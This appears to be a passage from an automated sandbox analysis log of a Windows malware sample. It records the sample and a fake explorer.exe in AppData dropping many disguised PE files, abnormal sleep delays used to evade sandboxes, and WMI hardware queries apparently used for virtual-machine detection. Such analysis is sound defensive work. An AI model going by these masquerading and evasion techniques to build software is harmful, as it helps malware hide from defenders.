                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 974
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 949
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1442
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1327
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2738
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1191
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UJAAAsrr.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AxLDtRxd.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\qVqwKxgw.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DrOTkRbS.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DiqTAfIW.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pxxplmMK.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GWITZydS.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TmvagkQx.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SVwsOfwt.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nTDOpObA.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CxYvgXXc.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ufMwPuFo.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hovXJzGK.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FnPmnTXV.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wdeWzfMx.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uNFeAYLl.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UPlQSaAj.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FZhLDyOY.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bvfQbQIf.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HzZUtpuN.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QwEjYoPD.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ELylTcFa.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\aIOpvFFY.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ySVMqwBm.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\liYyiBRH.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bqhiOmsd.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fJbhCUkS.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xQsMWHQg.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zJHvHEBf.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gljzVSiX.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eJSyBaRc.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jWOPcftP.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cSkqvYkZ.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vEieQmso.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UOyjNWIs.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TvSaQXjt.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\scaNtKAs.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sUqvPban.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\dGozhlgX.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SSKIxalp.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\uaPNCQpm.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WJAzEWli.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tQeVfYwq.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GzLcGkVO.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LmdbigkC.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ejwQzjeb.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\QhesqMaw.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TkfSyAEq.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe Dropped PE file which has not been started: C:\Users\user\Desktop\nDhGzpaM.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FBkUkkGT.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe TID: 5328 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 Thread sleep count: 8142 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 7688 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 594 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236 Thread sleep count: 8287 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044 Thread sleep count: 135 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788 Thread sleep count: 8133 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856 Thread sleep count: 8341 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep count: 80 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep count: 8195 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 639 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296 Thread sleep count: 8016 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 7682 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076 Thread sleep count: 408 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep count: 7805 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340 Thread sleep count: 7676 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256 Thread sleep count: 398 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 8022 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep count: 7405 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360 Thread sleep count: 191 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 8092 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599579s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599422s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599289s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599157s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -599008s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -598823s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -598610s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212 Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9196Thread sleep time: -10800000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -598012s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597641s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9196Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597422s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597277s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596844s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596704s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596547s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596384s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596219s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596037s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595655s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595527s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595396s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594922s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594645s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594513s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594389s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594125s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593919s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593790s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593671s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593562s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593336s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593208s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593066s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592929s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592815s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592701s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592594s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592466s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592359s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592204s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592047s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591923s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591812s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591688s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591563s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591344s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591222s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591094s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590979s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590874s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590750s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590579s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590468s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590358s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590215s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590006s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589750s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589488s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589344s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589233s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589104s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588948s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588829s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588718s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588610s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588485s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588360s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588235s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588100s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587978s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587875s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587755s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587641s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587532s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587307s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586768s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586547s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586438s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586313s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 1091 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8908Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504Thread sleep count: 660 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704Thread sleep count: 870 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep count: 1008 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8924Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep count: 1228 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9016Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep count: 989 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8668Thread sleep count: 974 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9112Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 949 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9084Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8944Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676Thread sleep count: 1442 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8932Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep count: 1327 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9104Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep count: 2738 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9080Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844Thread sleep count: 1191 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Last function: Thread delayed
                    Source: C:\Windows\System32\PING.EXE, Last function: Thread delayed
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe, File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, File Volume queried: C:\ FullSizeInformation
